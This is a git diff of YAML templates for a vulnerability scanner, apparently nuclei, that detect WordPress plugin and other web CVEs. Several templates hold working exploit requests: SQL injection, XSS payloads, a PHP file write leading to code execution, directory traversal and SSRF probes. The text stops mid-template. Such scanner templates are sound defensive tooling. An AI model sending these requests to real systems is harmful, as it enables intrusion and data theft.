- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14

7
cves/2021/CVE-2021-24838.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2021-24838
info:
name: AnyComment < 0.3.5 - Open Redirect
name: WordPress AnyComment <0.3.5 - Open Redirect
author: noobexploiter
severity: medium
description: |
The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
WordPress AnyComment plugin before 0.3.5 contains an open redirect vulnerability via an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
- type: status
status:
- 302
# Enhanced by md on 2022/10/14

7
cves/2021/CVE-2021-24940.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-24940
info:
name: Persian Woocommerce < 5.9.8 - Cross-Site Scripting
name: WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting
author: daffainfo
severity: medium
description: |
The Persian Woocommerce WordPress plugin through 5.8.0 does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue
WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.
remediation: Fixed in 5.9.8.
reference:
- https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f
- https://nvd.nist.gov/vuln/detail/CVE-2021-24940
@ -41,3 +42,5 @@ requests:
- contains(body_2, 'accesskey=X onclick=alert(1) test=')
- contains(body_2, 'woocommerce_persian_translate')
condition: and
# Enhanced by md on 2022/10/17

51
cves/2021/CVE-2021-25003.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2021-25003
info:
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
reference:
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
- https://wordpress.org/plugins/wpcargo/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-25003
cwe-id: CWE-434
metadata:
verified: "true"
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
variables:
num: "999999999"
requests:
- raw:
- |
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2={{md5(num)}}
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1 != 200"
- "status_code_2 == 200"
- "status_code_3 == 200"
- "contains(body_3, md5(num))"
- "contains(body_3, 'PNG')"
condition: and

7
cves/2021/CVE-2021-25111.yaml
View File

@ -1,12 +1,13 @@
id: CVE-2021-25111
info:
name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect
name: WordPress English Admin <1.5.2 - Open Redirect
author: akincibor
severity: medium
description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue.
description: WordPress English Admin plugin before 1.5.2 contains an open redirect vulnerability. The plugin does not validate the admin_custom_language_return_url before redirecting users to it. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4
- https://nvd.nist.gov/vuln/detail/CVE-2021-25111
tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -24,3 +25,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

6
cves/2021/CVE-2021-27909.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-27909
info:
name: Mautic - Cross-Site Scripting
name: Mautic <3.3.4 - Cross-Site Scripting
author: kiransau
severity: medium
description: Mautic versions prior to 3.3.4 are vulnerable to reflected XSS on password reset page where a vulnerable parameter, "bundle," in the URL could allow an attacker to execute Javascript code.
description: Mautic before 3.3.4 contains a cross-site scripting vulnerability on the password reset page in the bundle parameter of the URL. An attacker can inject arbitrary script, steal cookie-based authentication credentials, and/or launch other attacks.
reference:
- https://github.com/mautic/mautic/security/advisories/GHSA-32hw-3pvh-vcvc
- https://nvd.nist.gov/vuln/detail/CVE-2021-27909
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

21
cves/2021/CVE-2021-29490.yaml
View File

@ -1,31 +1,36 @@
id: CVE-2021-29490
info:
name: Jellyfin 10.7.2 SSRF
name: Jellyfin 10.7.2 - SSRF
author: alph4byt3
severity: medium
description: Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
description: |
Jellyfin is a free software media system. Versions 10.7.2 and below are vulnerable to unauthenticated Server-Side Request Forgery (SSRF) attacks via the imageUrl parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-rgjw-4fwc-9v96
- https://nvd.nist.gov/vuln/detail/CVE-2021-29490
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2021-29490
cwe-id: CWE-918
remediation: Upgrade to version 10.7.3 or newer. As a workaround, disable external access to the API endpoints "/Items/*/RemoteImages/Download", "/Items/RemoteSearch/Image" and "/Images/Remote".
tags: cve,cve2021,ssrf,jellyfin
metadata:
verified: true
shodan-query: http.title:"Jellyfin"
tags: cve,cve2021,ssrf,jellyfin,oast
requests:
- method: GET
path:
- "{{BaseURL}}/Images/Remote?imageUrl=http://{{interactsh-url}}"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://{{interactsh-url}}&ProviderName=TheMovieDB"
- "{{BaseURL}}/Images/Remote?imageUrl=http://interact.sh/"
- "{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=http://interact.sh/&ProviderName=TheMovieDB"
stop-at-first-match: true
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
part: body
words:
- "http"
- "<h1> Interactsh Server </h1>"
# Enhanced by cs on 2022/02/25

8
cves/2021/CVE-2021-29622.yaml
View File

@ -1,14 +1,16 @@
id: CVE-2021-29622
info:
name: Prometheus v2.23.0 to v2.26.0, and v2.27.0 Open Redirect
name: Prometheus - Open Redirect
author: geeknik
severity: medium
description: In 2.23.0, Prometheus changed its default UI to the New ui. To ensure a seamless transition, the URL's prefixed by /new redirect to /. Due to a bug in the code, it is possible for an attacker to craft an URL that can redirect to any other URL, in the /new endpoint.
description: Prometheus 2.23.0 through 2.26.0 and 2.27.0 contains an open redirect vulnerability. To ensure a seamless transition to 2.27.0, the default UI was changed to the new UI with a URL prefixed by /new redirect to /. Due to a bug in the code, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
remediation: The issue was patched in the 2.26.1 and 2.27.1 releases. In 2.28.0, the /new endpoint will be removed completely. The workaround is to disable access to /new via a reverse proxy in front of Prometheus.
reference:
- https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
- https://github.com/prometheus/prometheus/releases/tag/v2.26.1
- https://github.com/prometheus/prometheus/releases/tag/v2.27.1
- https://nvd.nist.gov/vuln/detail/CVE-2021-29622
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -26,3 +28,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/14

10
cves/2021/CVE-2021-32618.yaml
View File

@ -1,12 +1,10 @@
id: CVE-2021-32618
info:
name: Flask Open Redirect
name: Python Flask-Security - Open Redirect
author: 0x_Akoko
severity: medium
description: There is code in FS to validate that the url specified in the next parameter is either relative OR has the same netloc (network location) as the requesting URL. This check utilizes Pythons urlsplit
library. However many browsers are very lenient on the kind of URL they accept and 'fill in the blanks' when presented with a possibly incomplete URL. As a concrete example - setting http://login?next=\\\github.com
will pass FS's relative URL check however many browsers will gladly convert this to http://interact.sh.
description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c
- https://github.com/Flask-Middleware/flask-security/issues/486
@ -27,4 +25,6 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

64
cves/2021/CVE-2021-33851.yaml Normal file
View File

@ -0,0 +1,64 @@
id: CVE-2021-33851
info:
name: Customize Login Image < 3.5.3 - Cross-Site Scripting
author: 8authur
severity: medium
description: |
A cross-site scripting (XSS) attack can cause arbitrary code (JavaScript) to run in a user's browser and can use an application as the vehicle for the attack. The XSS payload given in the "Custom logo link" executes whenever the user opens the Settings Page of the "Customize Login Image" Plugin.
reference:
- https://wpscan.com/vulnerability/c67753fb-9111-453e-951f-854c6ce31203
- https://cybersecurityworks.com/zerodays/cve-2021-33851-stored-cross-site-scripting-in-wordpress-customize-login-image.html
- https://wordpress.org/plugins/customize-login-image/
- https://nvd.nist.gov/vuln/detail/cve-2021-33851
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-33851
cwe-id: CWE-79
metadata:
verified: "true"
tags: wpscan,cve2021,wordpress,customize-login-image,wp,authenticated,cve,wp-plugin,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=
- |
GET /wp-login.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_4 == 200'
- 'contains(all_headers_4, "text/html")'
- 'contains(body_4, "Go to <script>alert(document.domain)</script>")'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-zA-Z]+)"'
internal: true

7
cves/2021/CVE-2021-3654.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2021-3654
info:
name: noVNC Open Redirect
name: Nova noVNC - Open Redirect
author: geeknik
severity: medium
description: A user-controlled input redirects noVNC users to an external website.
description: Nova noVNC contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://seclists.org/oss-sec/2021/q3/188
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
- https://bugs.python.org/issue32084
- https://opendev.org/openstack/nova/commit/04d48527b62a35d912f93bc75613a6cca606df66
- https://nvd.nist.gov/vuln/detail/CVE-2021-3654
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
status:
- 302
- 301
# Enhanced by md on 2022/10/14

2
cves/2021/CVE-2021-39327.yaml
View File

@ -14,7 +14,7 @@ info:
cvss-score: 5.3
cve-id: CVE-2021-39327
cwe-id: CWE-200
tags: exposures,packetstorm,cve,cve2021,wordpress
tags: exposure,packetstorm,cve,cve2021,wordpress
requests:
- method: GET

40
cves/2021/CVE-2021-40661.yaml Normal file
View File

@ -0,0 +1,40 @@
id: CVE-2021-40661
info:
name: IND780 - Directory Traversal
author: For3stCo1d
severity: high
description: |
A remote, unauthenticated, directory traversal vulnerability was identified within the web interface used by IND780 Advanced Weighing Terminals Build 8.0.07 March 19, 2018 (SS Label 'IND780_8.0.07'), Version 7.2.10 June 18, 2012 (SS Label 'IND780_7.2.10'). It was possible to traverse the folders of the affected host by providing a traversal path to the 'webpage' parameter in AutoCE.ini This could allow a remote unauthenticated adversary to access additional files on the affected system. This could also allow the adversary to perform further enumeration against the affected host to identify the versions of the systems in use, in order to launch further attacks in future.
reference:
- https://sidsecure.au/blog/cve-2021-40661/?_sm_pdc=1&_sm_rid=MRRqb4KBDnjBMJk24b40LMS3SKqPMqb4KVn32Kr
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40661
- https://www.mt.com/au/en/home/products/Industrial_Weighing_Solutions/Terminals-and-Controllers/terminals-bench-floor-scales/advanced-bench-floor-applications/IND780/IND780_.html#overviewpm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-40661
cwe-id: CWE-22
metadata:
google-query: inurl:excalweb.dll
shodan-query: IND780
verified: "true"
tags: cve,cve2021,ind780,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ExePath=\Windows'
- 'WorkDir=\Windows'
condition: and
- type: status
status:
- 200

6
cves/2021/CVE-2021-41432.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2021-41432
info:
name: FlatPress 1.2.1 - Cross-site scripting
name: FlatPress 1.2.1 - Stored Cross-Site Scripting
author: arafatansari
severity: medium
description: |
A stored cross-site scripting (XSS) vulnerability exists in FlatPress 1.2.1 that allows for arbitrary execution of JavaScript commands through blog content.
FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.
reference:
- https://github.com/flatpressblog/flatpress/issues/88
- https://nvd.nist.gov/vuln/detail/CVE-2021-41432
@ -74,3 +74,5 @@ requests:
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
# Enhanced by md on 2022/10/17

52
cves/2022/CVE-2022-0147.yaml Normal file
View File

@ -0,0 +1,52 @@
id: CVE-2022-0147
info:
name: Cookie Information < 2.0.8 - Reflected Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Cookie Information plugin does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1
- https://wordpress.org/plugins/wp-gdpr-compliance/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0147
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0147
cwe-id: CWE-79
metadata:
verified: "true"
tags: cve2022,wordpress,xss,wp,authenticated,cve,wp-plugin,wp-gdpr-compliance,wpscan
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'"
- "toplevel_page_wp-gdpr-compliance"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

6
cves/2022/CVE-2022-0412.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0412
info:
name: TI WooCommerce Wishlist WP plugin < 1.40.1 - SQL Injection
name: WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
author: edoardottt
severity: critical
description: |
The TI WooCommerce Wishlist WordPress plugin before 1.40.1, TI WooCommerce Wishlist Pro WordPress plugin before 1.40.1 do not sanitise and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint, allowing unauthenticated attackers to perform SQL injection attacks.
WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
reference:
- https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
- https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 400
# Enhanced by mp on 2022/10/12

6
cves/2022/CVE-2022-0535.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0535
info:
name: E2Pdf < 1.16.45 - Cross-Site Scripting
name: WordPress E2Pdf <1.16.45 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
The E2Pdf WordPress plugin before 1.16.45 does not sanitise and escape some of its settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://wpscan.com/vulnerability/a4162e96-a3c5-4f38-a60b-aa3ed9508985
- https://wordpress.org/plugins/e2pdf/
@ -62,3 +62,5 @@ requests:
group: 1
regex:
- 'name="_nonce" value="([0-9a-zA-Z]+)"'
# Enhanced by md on 2022/10/18

7
cves/2022/CVE-2022-0679.yaml
View File

@ -1,15 +1,14 @@
id: CVE-2022-0679
info:
name: Narnoo Distributor <= 2.5.1 - Unauthenticated LFI to Arbitrary File Read / RCE
name: WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion
author: Veshraj
severity: critical
description: |
The plugin fails to validate and sanitize the lib_path parameter before it is passed into a call to require() via the narnoo_distributor_lib_request AJAX action (available to both unauthenticated and authenticated users) which results in the disclosure of arbitrary files as the content of the file is then displayed in the response as JSON data. This could also lead to RCE with various tricks but depends on the underlying system and it's configuration.
WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.
reference:
- https://wpscan.com/vulnerability/0ea79eb1-6561-4c21-a20b-a1870863b0a8
- https://nvd.nist.gov/vuln/detail/CVE-2022-0679
- https://www.cvedetails.com/cve/CVE-2022-0679/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -39,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/10/12

6
cves/2022/CVE-2022-0781.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2022-0781
info:
name: Nirweb support < 2.8.2 - Unauthenticated SQLi
name: WordPress Nirweb Support <2.8.2 - SQL Injection
author: theamanrawat
severity: critical
description: |
The Nirweb support WordPress plugin before 2.8.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection.
WordPress Nirweb support plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not sanitize and escape a parameter before using it in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://wpscan.com/vulnerability/1a8f9c7b-a422-4f45-a516-c3c14eb05161
- https://wordpress.org/plugins/nirweb-support/
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/12

41
cves/2022/CVE-2022-0817.yaml Normal file
View File

@ -0,0 +1,41 @@
id: CVE-2022-0817
info:
name: BadgeOS < 3.7.1 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The BadgeOS WordPress plugin through 3.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
reference:
- https://wpscan.com/vulnerability/69263610-f454-4f27-80af-be523d25659e
- https://wordpress.org/plugins/badgeos/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0817
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0817
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2022,wp,unauth,sqli,cve,wp-plugin,badgeos,wpscan,wordpress
variables:
num: "999999999"
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=get-achievements&total_only=true&user_id=11 UNION ALL SELECT NULL,CONCAT(1,md5({{num}}),1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- "contains(body, md5(num))"
- 'contains(content_type, "application/json")'
- 'contains(body, "badgeos-arrange-buttons")'
condition: and

44
cves/2022/CVE-2022-0885.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-0885
info:
name: Member Hero <= 1.0.9 - Unauthenticated Remote Code Execution
author: theamanrawat
severity: critical
description: |
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
reference:
- https://wpscan.com/vulnerability/8b08b72e-5584-4f25-ab73-5ab0f47412df
- https://wordpress.org/plugins/member-hero/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0885
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0885
cwe-id: CWE-94
metadata:
verified: "true"
tags: unauth,wpscan,wp-plugin,rce,wp,wordpress,member-hero,cve,cve2022
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'

12
cves/2022/CVE-2022-0928.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-0928
info:
name: Microweber <1.2.12 - Stored Cross-Site Scripting
name: Microweber < 1.2.12 - Stored Cross-Site Scripting
author: amit-jd
severity: medium
description: |
@ -16,8 +16,8 @@ info:
cve-id: CVE-2022-0928
cwe-id: CWE-79
metadata:
verified: "true"
tags: authenticated,huntr,cve,cve2022,xss,microweber,cms
verified: true
tags: cve,cve2022,authenticated,huntr,xss,microweber,cms
requests:
- raw:
@ -36,7 +36,7 @@ requests:
id=0&name=vat1&type="><img+src%3dx+onerror%3dalert(document.domain)>&rate=10
- |-
- |
POST /module HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
@ -49,9 +49,9 @@ requests:
matchers:
- type: dsl
dsl:
- contains(body_3,'<td>\"><img src=x onerror=alert(document.domain)></td>')
- 'contains(body_3,"<img src=x onerror=alert(document.domain)></td>")'
- 'contains(all_headers_3,"text/html")'
- 'status_code==200'
- 'status_code_2 == 200 && status_code_3 == 200'
condition: and
# Enhanced by mp on 2022/09/14

44
cves/2022/CVE-2022-1007.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2022-1007
info:
name: Advanced Booking Calendar < 1.7.1 - Cross-Site Scripting
author: 8arthur
severity: medium
description: |
The Advanced Booking Calendar WordPress plugin before 1.7.1 does not sanitise and escape the room parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
reference:
- https://wpscan.com/vulnerability/6f5b764b-d13b-4371-9cc5-91204d9d6358
- https://wordpress.org/plugins/advanced-booking-calendar/
- https://nvd.nist.gov/vuln/detail/cve-2022-1007
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1007
cwe-id: CWE-79
metadata:
verified: "true"
tags: wp-plugin,advanced-booking-calendar,cve,cve2022,wp,authenticated,wpscan,wordpress,xss
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars&setting=changeSaved&room=1111%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(body_2, '<script>alert(document.domain)</script>')"
- "contains(body_2, 'advanced-booking-calendar')"
- "contains(all_headers_2, 'text/html')"
- "status_code_2 == 200"
condition: and

35
cves/2022/CVE-2022-1057.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-1057
info:
name: Pricing Deals for WooCommerce < 2.0.3 - Unauthenticated SQL Injection
author: theamanrawat
severity: critical
description: |
The Pricing Deals for WooCommerce WordPress plugin through 2.0.2.02 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to an unauthenticated SQL injection.
reference:
- https://wpscan.com/vulnerability/7c33ffc3-84d1-4a0f-a837-794cdc3ad243
- https://wordpress.org/plugins/pricing-deals-for-woocommerce/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1057
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1057
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,pricing-deals-for-woocommerce,unauth
requests:
- raw:
- |
@timeout: 15s
GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 500'
- 'contains(body, "been a critical error")'
condition: and

54
cves/2022/CVE-2022-1574.yaml Normal file
View File

@ -0,0 +1,54 @@
id: CVE-2022-1574
info:
name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
reference:
- https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
- https://wordpress.org/plugins/html2wp/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1574
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1574
cwe-id: CWE-434
metadata:
verified: "true"
tags: wp-plugin,wp,fileupload,unauth,wpscan,cve2022,wordpress,intrusive,cve,html2wp
requests:
- raw:
- |
